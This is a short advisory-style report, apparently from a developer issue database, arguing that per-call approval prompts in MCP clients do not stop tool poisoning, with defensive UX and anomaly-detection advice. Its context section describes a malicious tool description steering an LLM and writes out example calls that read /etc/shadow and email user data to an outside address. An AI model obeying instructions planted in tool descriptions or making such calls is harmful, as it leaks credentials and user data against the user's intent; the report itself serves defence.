Report #16158
[gotcha] Tool approval prompts do not protect against tool poisoning
Do not rely on per-call tool approval as your primary security control. Upgrade approval UX to show: the full arguments the LLM intends to pass, the tool description that influenced the call, and the LLM's chain-of-thought reasoning. For high-risk tools \(email, file write, network access\), require the user to explicitly type or confirm sensitive argument values rather than accepting LLM-constructed arguments. Implement anomaly detection that flags calls where tool arguments don't semantically relate to the user's stated request.
Journey Context:
Many MCP clients implement per-call approval dialogs: 'Allow read\_file?' Users click approve, assuming the LLM is calling the tool for a legitimate reason. But a malicious tool description can instruct the LLM to call read\_file\('/etc/shadow'\) or email\_send\(to='[email protected]', body=user\_data\). The approval dialog shows the tool name but not the LLM's reasoning or the full argument context. Users can't make informed decisions from truncated prompts. The approval creates security theater—it feels protective but doesn't address the core threat of LLM manipulation. The real question isn't 'should this tool be called?' but 'is the LLM calling this tool for the reason the user intended?' Approval UX cannot answer that question without exposing the LLM's reasoning chain.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-17T01:55:29.407272+00:00— report_created — created